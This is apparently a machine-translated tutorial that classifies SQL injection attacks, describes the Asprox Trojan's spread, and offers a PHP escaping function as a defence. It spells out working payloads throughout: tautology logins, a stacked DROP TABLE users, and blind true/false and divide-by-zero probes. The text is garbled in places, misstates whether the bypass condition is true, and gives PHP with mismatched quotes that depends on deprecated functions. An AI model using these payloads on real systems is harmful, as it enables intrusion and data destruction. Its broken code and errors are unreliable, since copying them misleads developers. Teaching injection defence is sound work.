1. Escape characters are not filtered correctly
This form of injection or attack occurs when the user's input does not escape character filtering, which is passed to an SQL statement. This causes the end user of the application to perform operations on the statements on the database. For example, the following line of code demonstrates this vulnerability:
The code is as follows |
Copy Code |
"SELECT * from users WHERE name = '" + userName + "';" |
This code is designed to take a particular user out of its user table, but if the user name is forged in a particular way by a malicious user, the statement may perform an action that is not just what the author of the code expects. For example, the user name variable (that is, username) is set to: a ' or ' t ' = ' t, at which point the original statement has changed:
The code is as follows |
Copy Code |
SELECT * from users WHERE name = ' a ' OR ' t ' = ' t '; |
If this code is used for an authentication process, then this example can force a valid username to be chosen because the assignment ' t ' = ' t ' is always correct.
On some SQL Servers, as in SQL Server, any SQL command can be injected through this method, including executing multiple statements. The value of the username in the following statement will result in the deletion of the users table and the selection of all the data from the "Data" table (which in fact reveals each user's information).
The code is as follows |
Copy Code |
A ';D ROP TABLE users; SELECT * FROM data WHERE name like '% |
Make the last SQL statement the following:
The code is as follows |
Copy Code |
SELECT * from users WHERE name = ' A ';D rop TABLE users; SELECT * FROM data WHERE name like '% '; |
Other SQL executions do not use multiple commands in the same query as a security measure. This prevents an attacker from injecting a fully independent query, but does not prevent an attacker from modifying the query.
2. Incorrect type handling
This form of attack is sent if the field provided by a user is not a strong type, or if the type coercion is not enforced. This attack occurs when a numeric field is used in an SQL statement, and if the programmer does not check the legality of the user's input (whether it is a numeric type). For example:
The code is as follows |
Copy Code |
"SELECT * FROM data WHERE id =" + a_variable + ";" |
As you can see from this statement, the author wants a_variable to be a number related to the "id" field. However, if the end user chooses a string, it bypasses the need for the escape character. For example, set the a_variable to: 1; Drop table users, which deletes the users table from the database, and the SQL statement becomes:
The code is as follows |
Copy Code |
SELECT * FROM data WHERE id = 1; DROP TABLE users; |
3. Vulnerabilities in the database server
Sometimes, there are vulnerabilities in the database server software, such as the mysql_real_escape_string () function vulnerability in the MySQL server. This vulnerability allows an attacker to execute a successful SQL injection attack based on the wrong uniform character encoding.
4. Blind SQL injection type attack
A so-called blind SQL injection attack occurs when a Web application is vulnerable and its results are not visible to the attacker. A vulnerable web page might not display data, but instead display different content based on the results of a logical statement injected into a legitimate statement. This attack is time-consuming, because a new statement must be constructed carefully for each byte that is obtained. But once the location of the vulnerability and the location of the target information are established, a tool called Absinthe can automate this attack.
5. Conditional response
Note that there is a SQL injection that forces the database to compute the value of a logical statement on a normal application screen:
The code is as follows |
Copy Code |
SELECT booktitle from Booklist WHERE bookid = ' ook14cd ' and 1=1 |
This will result in a standard screen, while the statement
SELECT booktitle from Booklist where BookID = ' ook14cd ' and 1=2 it is possible to give a different result when the page is vulnerable to SQL injection attacks. Such an injection would prove that a blind SQL injection was possible, which would allow an attacker to design statements that could be judged to be authentic based on the contents of a field in another table.
6. Conditional errors
If the WHERE statement is true, this type of blind SQL injection forces the database to judge a statement that causes the error, resulting in a SQL error. For example:
The code is as follows |
Copy Code |
SELECT 1/0 from users WHERE username= ' Ralph '. |
Obviously, if the user Ralph exists, being 0 will cause an error.
7. Time delay
Time delay is a blind SQL injection that, according to the injected logic, can cause the SQL engine to execute a long queue or a iyige time delay statement. An attacker could measure the time the page was loaded to determine whether the injected statement was true.
The above is just a rough classification of SQL attacks. But technically, today's SQL injection attackers are smarter and more comprehensive about how to find vulnerable sites. Some new methods of SQL attack have emerged. Hackers can use a variety of tools to speed up the exploit process. Let's take a look at the Asprox Trojan, which is mainly spread through a spam-sending zombie network, and its entire work can be described as follows: first, the Trojan is installed on the computer by a spam message sent by a controlled host, and then The computer infected by this Trojan will download a piece of binary code that, when it starts, will use the seo/seo.html "target=" _blank > Search engine to find a vulnerable web site that uses Microsoft's ASP technology to create a form. The result of the search is a list of targets for SQL injection attacks. The Trojan will then launch a SQL injection attack on these sites, allowing some sites to be controlled and corrupted. Users who visit these controlled and compromised sites will be tricked into downloading malicious JavaScript code from another site. Finally, this code will guide the user to the third site, there are more malicious software, such as password-stealing Trojan.
Previously, we often warned or recommended that Web application programmers test and patch their code, although SQL injection vulnerabilities are not likely to be discovered and exploited. But more recently, attackers have discovered and maliciously exploited these vulnerabilities. Therefore, before deploying its software, developers should be more proactive in testing their code and patching up the code as soon as new vulnerabilities emerge.
For example, some people might use this method to get around the landing window. If your query username and password are in the same form as this:
code is as follows |
copy code |
[code= ' SQL ' SELECT * from users WHERE username = {username} and Password = {password} [/code] Then the user can use any user name to use this password: [code= ' sql '] ' OR ' = ' [/code] so that your MySQL query that validates your username password becomes: [code= ' sql '] SELECT * from users WHERE username = ' Anyuser ' and Password = ' OR ' = ' [/code] |
The query condition is never true because the empty string is always equal to an empty string. As a result, the risk of MySQL injection is significant, as attackers can see data that should have been accessed by landing. It is important to prevent your site from being injected. Luckily, PHP can help us prevent an injection attack.
MySQL will return all the rows in the table, depending on your program logic, it may cause all users to log in because they are all matched. Now, most of the time, people will open the MAGIC_QUOTES_GPC option (also the default for PHP), and this configuration will automatically add backslashes, Escape all ' (single quotes), (double quotes), (backslash) and null characters. But things are not as simple as they are, because not all the characters that cause the risk are escaped. PHP has a function that escapes all MySQL characters that may bring extra SQL clauses. This function is mysql_real_escape_string ().
Be careful when using this function, because you may have turned on the MAGIC_QUOTES_GPC option, and using mysql_real_escape_string () will result in a second escape. The following function avoids this problem by first determining whether the
MAGIC_QUOTES_GPC option is open and then deciding whether to execute mysql_real_escape_string ().
[code= ' php ']
code is as follows |
copy code |
//add quotes to variables to ensure security function Quote_smart ($value) { $link =mysql_connect (' mysql_host ', ' mysql_user ', ' Mysql_password '); //To escape if (GET_MAGIC_QUOTES_GPC ()) { $value =stripslashes ($value); } //To all Non-numeric quotes if (!is_numeric ($value)) { $value = ' "'. Mysql_real_escape_string ($value, $link)." ' "; } return $value; } ? |
[/code]
Note that the Quote_smart () function automatically quotes strings, so you don't need to add them yourself.
Also note that because different versions of MySQL are not required for filtering, mysql_real_escape_string () requires a MySQL connection to work, so a second parameter must be passed in to a MySQL connection. MySQL installed on this computer, you can omit, but if this machine does not install MySQL, or remote connection to MySQL, this parameter is necessary, otherwise mysql_real_escape_string () will return an empty string.